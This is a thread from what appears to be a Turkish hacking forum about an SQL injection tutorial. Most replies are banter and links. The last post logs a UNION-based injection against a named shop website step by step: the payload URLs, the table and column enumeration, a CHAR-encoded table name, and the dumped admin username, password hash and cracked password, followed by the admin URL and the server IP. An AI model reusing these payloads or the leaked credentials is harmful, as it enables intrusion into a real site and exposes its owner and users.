Forum
Aktif konular
Üyeler
Kurallar
Arama
Sql Injection Anlatım Sql Injection Anlatım
-
KaptanMagaraAdami bunu yazdı:
-----------------------------
dersimlihacker bunu yazdı:
-----------------------------
-----------------------------
site.asp?id=0+union+select+0+from+tabloadi yaparak şifre veya kullanıcı adı
çekiceksiniza. qdukarlım gidip haber tablosunu yazıyorlar sonra haberler
bölümünden user veya pass çekmeye çalışıyor ... a.q hiç
mantıklımı haberlerden user veya pass çekmek ...
Ne kadar zarif, ne kadar derin bir anlatım.
Demek ki insanlar ikiye ayrılıyor: dersimlihacker'ın a.qduklarıyla a.qoymadıkları olarak ...
-----------------------------+1 düzelttim...
-
KaptanMagaraAdami bunu yazdı:
-----------------------------
dersimlihacker bunu yazdı:
-----------------------------
-----------------------------
site.asp?id=0+union+select+0+from+tabloadi yaparak şifre veya kullanıcı adı
çekiceksiniza. qdukarlım gidip haber tablosunu yazıyorlar sonra haberler
bölümünden user veya pass çekmeye çalışıyor ... a.q hiç
mantıklımı haberlerden user veya pass çekmek ...
Ne kadar zarif, ne kadar derin bir anlatım.
Demek ki insanlar ikiye ayrılıyor: dersimlihacker'ın a.qduklarıyla a.qoymadıkları olarak ...
-----------------------------kendimi bir an cmylmz'ın showlarından birinde zannettim :D
-
legendary bunu yazdı:
-----------------------------
Bide bunu önlemek için döküman yazsan daha şık durur
-----------------------------http://tahribat.com/Dokuman-Sql-Enjeksiyon-Nedir-Nasil-Korunulur-245/
-
Düzeltmeler için sağolun :) İnş yeni dökümanlarla sizlerle olucam zaten sınavlarımda bitti :D ama daha büyük sınav öss var onuda atlattıktan sonra daha bi özen göstericem bu anlatım olaylarına
-
dersimlihacker bunu yazdı:
-----------------------------
Düzeltmeler için sağolun :) İnş yeni dökümanlarla sizlerle olucam zaten sınavlarımda bitti :D ama daha büyük sınav öss var onuda atlattıktan sonra daha bi özen göstericem bu anlatım olaylarına
-----------------------------video çekersen daha şekil olur :P
-
eyw kardeşim.
-
sql linki vermeyi unutmuşsun :) onuda ben vereyim
http://cryptosuite.org/forum/yeni-baslayanlar-new-learners/762-sql-injection.html
-
Gormeyenler gorsun, bende ufaktan cizmis oluyum :)
-
Güzel anlatım olmuş bir denme yapayım dedim oldu sanırsam
http://shoespack.com/index.php?proclassid=35+[SQL]
http://shoespack.com/index.php?proclassid=-35+union+select+1,2,3,4-- (2)
http://shoespack.com/index.php?proclassid=-35+union+select+1,version(),3,4-- 5.0.91-log
http://shoespack.com/index.php?proclassid=-35+union+select+1,group_concat(table_name)
,3,4+from+information_schema.tables--
CHARACTER_SETS,CLIENT_STATISTICS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,
COLUMNS,COLUMN_PRIVILEGES,INNODB_BUFFER_POOL_CONTENT,INDEX_STATISTICS,KEY_COLUMN_USAGE,
PROCESSLIST,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,TABLE_STATISTICS,TRIGGERS,USER_PRIVILEGES,USER_STATISTICS,VIE
,3,4+from+information_schema.tables+where+table_schema=database()--
pa_adminlog,pa_imgpro,pa_loginlog,pa_message,pa_proclass,pa_session,pa_user,pa_usergroup
,3,4+from+information_schema.columns+where+table_name=
CHAR(112,%2097,%2095,%20108,%20111,%20103,%20105,%20110,%20108,%20111,%20103)--
loginlogid,username,password,date,ipaddress,extra
username: admin Pasword ( Hash:5d828a9c40f3e5ff78df079fca5df3ac) : inloveme
admin page:http://shoespack.com/admin/index.php
Web Server: Apache Server System: Linux
PHP Version: 5.2.17 MySQL Version: 5.0.91-log
register_globals: Close Upload File: Can Use
Server Addr: 173.201.169.21 Server Time: MST
Kısayol
Şikayet
Özel Mesaj
Alıntı yap
Cevapla